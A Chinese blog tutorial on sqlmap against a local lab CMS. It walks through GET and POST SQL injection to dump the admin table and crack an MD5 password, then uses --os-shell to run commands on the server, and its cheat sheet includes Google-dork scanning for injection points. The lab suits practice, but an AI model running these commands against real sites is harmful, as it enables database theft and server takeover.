sqlmap基础实战

已于 2023-08-24 22:36:54 修改
阅读量1.3k 收藏
点赞数 2
分类专栏: web渗透实战 文章标签: sqlmap 工具 os-shell getshell sql注入
于 2023-08-24 22:35:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46367450/article/details/132483978
版权

sqlmap基础实战

文章目录

sqlMap参数速查

参数含义
-u检测注入点
–dbs列出所有的库名
–current-user当前连接数据库用户的名字
–current-db当前数据库的名字
-D “cms” –tables指定目标数据库为cms 列出数据库中所有的表名
-T “cms_users”指定目标表名为’cms_users’
–columns -C ‘username,password’列出所有的字段名 指定目标字段
–dump -r列出字段内容 从文件中读取HTTP 请求
–os-shell在特定情况下,可以直接获得目标系统Shell
–level 3设置sqlmap 检测等级 3
–cookie=”username=admin”携带Cookie 信息进行注入
-g –batch利用google 搜索引擎自动搜索注入点 使用默认选项
–random-agent使用随机User-Agent 信息
-v 3显示payload

靶场地址

php环境:phpstudy20261103.exe

靶场:cms

领取地址:链接:https://pan.baidu.com/s/1OeEMML4GRCsbC4LpQK9KoA?pwd=jap0
提取码:jap0

获得网站后台管理员密码

利用sqlmap注入得到网站后台管理员账密

查找当前网站的数据库

python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" --dbs

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6TtOpOXv-1692887656050)(https://gitee.com/yuan_boss/yuanboss-pic-bed/raw/master/img2/image-20230824171820918.png)]

查找当前数据库

python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" --current-db

image-20230824171759799

查找cms中的表

python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33"  -D "cms" --tables

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zVgfIczH-1692887656051)(https://gitee.com/yuan_boss/yuanboss-pic-bed/raw/master/img2/image-20230824172345144.png)]

查找cms_users表中的字段

python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33"  -D "cms" -T "cms_users" --columns

image-20230824172431817

获得管理员密码

python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" -D "cms" -T "cms_users" -C "username,password" --dump

image-20230824172514477

md5解密

密文:e10adc3949ba59abbe56e057f2

image-20230824172615821

post注入

post注入,登录框

来到这个界面,经过尝试密码登录之后,发现是post请求,所以需要使用BP抓包

image-20230824172943010

这是抓到的包:

POST /cms/cms/admin/login.action.php HTTP/1.1
Host: 10.9.75.168
Content-Length: 51
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.9.75.168
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.9.75.168/cms/cms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: username=admin; HFS_SID_=0.912836692063138; PHPSESSID=a71e5r7upv1jm86jc01kvaius2
Connection: close

username=admin&image.x=55&image.y=19&password=admin

在kali中创建post.txt,然后将这个包放入post.txt中

通过sqlmap的-r参数进行post注入

查找当前数据库

python3 sqlmap -r /tmp/post.txt --current-db

image-20230824173847889

查找cms中的表

python3 sqlmap -r /tmp/post.txt  -D "cms" --tables

image-20230824172345144

查找cms_users表中的字段

python3 sqlmap -r /tmp/post.txt  -D "cms" -T "cms_users" --columns

image-20230824172431817

获得管理员密码

python3 sqlmap -r /tmp/post.txt -D "cms" -T "cms_users" -C "username,password" --dump

image-20230824172514477

md5解密

密文:e10adc3949ba59abbe56e057f2

image-20230824172615821

sqlmap getshell

使用sqlmap的os-shell进行getShell需要满足以下条件:

①知道网站的物理路径。

②网站路径具有写入的权限。

③sqlmap能够跑出数据库。

os-shell

python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" --os-shell

选择服务器语言为php

image-20230824173717613

假设已知网站根目录,选择第2个,自定义路径

image-20230824174102401

输入网址根目录的绝对路径

G:/SOFT/netSecurity/soft/phpstudy2016/phstudy2016-zc/WWW

image-20230824174130845

获得os-shell

image-20230824174259263

执行命令

image-20230824175550879

看上面结果可知,我们成功执行了CMD命令。

注意:如果执行cmd命令显示发生内部错误,大概率是php版本问题,我这里的php版本是5.5

yuan_boss
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[网络安全自学篇] 二十七.Sqlmap基础知识、CTF实战及请求参数设置(一)
杨秀璋的专栏
11-21 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Shodan搜索引擎的基本用法及Python命令行。本篇文章详细讲解了Sqlmap的基本用法、CTF实战,并且分享了请求参数设置的用法,包括设置HTTP、POST请求、参数分割、设置Cookie等。本文的CTF实例推荐大家自己去尝试,从而熟悉SQLMAP的基本用法。
sqlmap渗透实战进阶技巧
记录学习,一起进步
03-17 1371
sqlmap实战渗透进阶技巧
sqlmap实战oracle,网络攻防实战-sqlmap从入门到精通
weixin_39950083的博客
04-14 578
网络攻防实战-sqlmap从入门到精通第1章sqlmap安装及搭建测试平台1.1在windows上安装sqlmap1.2在centos上安装sqlmap1.3在kali虚拟机中安装及使用sqlmap1.4在kali上搭建dvwa测试平台1.5在windows上搭建sqlab测试平台第2章sqlmap基础及使用2.1配置sqlmap2.2sqlmap目录及结构2.3SQLMap使用攻略及技巧-已经完...
【网络安全 | 渗透工具SQLmap加密注入教程+实战详析
等风来
08-02 5979
在使用手工注入绕过参数加密的限制时,需要构造出原始POC再进行加密注入,耗时耗力,因此采用sqlmap加密注入。表示只对该参数进行注入测试,不加 * 的话还会测试其他参数是否为注入点,增加时间。选择默认选项,跑sqlmap的时候加上这句话可节约时间、不需要回复提示
sqlmap使用
zhoufy的博客
08-19 259
一、sqlmap常用基础命令 sqlmap Common operation command 以下命令顺序即为sql注入常见步骤。 sqlmap -u [“url”] --dbs #获取数据库 sqlmap -u [“url”] --current-user #获取当前用户名称 : sqlmap -u [“url”] --current-db #获取当前数据库名称 sqlmap -u [“url”] -D [‘数据库名’] --tables #列出表名 : sqlmap -u [“url”] -D...
渗透测试---手把手教你sqlmap数据库注入测试(1)---靶场实战篇_sqlmap靶场
2401_84239625的博客
04-20 600
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以添加V获取:vip1024b (备注软件测试)一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
细说——sqlmap
LainWith的博客
11-20 4651
目录一些地址关于SQLmap5种漏洞检测技术更多sqlmap参数常用命令指定某个url进行测试GET型POST型需要登录cookie型指定测试的参数检测cookie注入参数拆分字符从文件中加载HTTP请求测试GET型POST型从文本中获取多个目标扫描从谷歌引擎搜索结果扫描测试时常用的参数指定参数指定数据库指定数据库服务器系统指定无效的大数字指定无效的逻辑注入payload列出数据时常用的参数数据库版本用户获取所有库当前数据库当前用户是否为管理员列数据库用户列出并破解数据库用户的hash列出数据库管理员权限列
2024年网络安全-sqlmap实战之sqlilabs-Less5_sqlmap打less5,网络安全基础学习教程
2401_84253089的博客
05-06 818
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
SQLMap 源码阅读
蚁景网安学院
03-16 630
因为代码功底太差,所以想尝试阅读 sqlmap 源码一下,并且自己用 golang 重构,到后面会进行 ysoserial 的改写;以及 xray 的重构,当然那个应该会很多参考 cel-go 项目。
27.Sqlmap基础用法、CTF实战及请求参数设置(一)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。一.Sqlmap
WEB渗透基础实战详解.pdf
11-07
"WEB渗透基础实战详解" 本文主要讲解了WEB渗透的基础知识,包括SQL注入漏洞、WEB渗透整个过程的还原、sqlmap工具的使用等。 WEB渗透基础知识 在WEB渗透中,SQL注入漏洞是最常见的漏洞之一。SQL注入漏洞是指攻击...
iBATIS实战
11-13
书中既详实地介绍了iBATIS的设计理念和基础知识,也讨论了动态SQL、高速缓存、DAD框架等高级主题,还讲解了iBATIS在实际开发中的应用。书的最后给出了一个设计优雅、层次清晰的示例程序JGameStore,该示例涵盖全书的...
【推荐】最新超全的渗透测试学习基础教程集合(84份).zip
08-04
11.虚拟机VMware+Kali安装入门及Sqlmap基本用法; 12.Wireshark安装入门及抓取网站用户名密码(一); 13.Wireshark抓包原理(ARP劫持、MAC泛洪)及数据流追踪和图像抓取(二); 14.Python攻防之基础常识、正则...
Eastmount网络安全博客之各种工具及代码资源(IDA、BP、Nmap、Wireshark等)
10-11
虚拟机VMware+Kali安装入门及Sqlmap基本用法 [网络安全自学篇] 十二.Wireshark安装入门及抓取网站用户名密码(一) [网络安全自学篇] 十三.Wireshark抓包原理(ARP劫持、MAC泛洪)及数据流追踪和图像抓取(二) ...
操作系统期末复习笔记!
06-13
操作系统期末复习笔记
pyzmq-22.0.0-cp38-cp38-manylinux2010_i686.whl
06-13
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
pyzmq-25.1.1b2-cp37-cp37m-win_amd64.whl
最新发布
06-13
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
香港某银行-CRYPTO业务资料
06-13
香港某银行--CRYPTO业务资料
sqlmap使用基础
04-27
以下是SQLMAP工具基础使用方法[^1]: 1. 获取数据库表: ```shell sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 1 -D security --tables ``` 这个命令将会获取指定URL中的数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yuan_boss

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值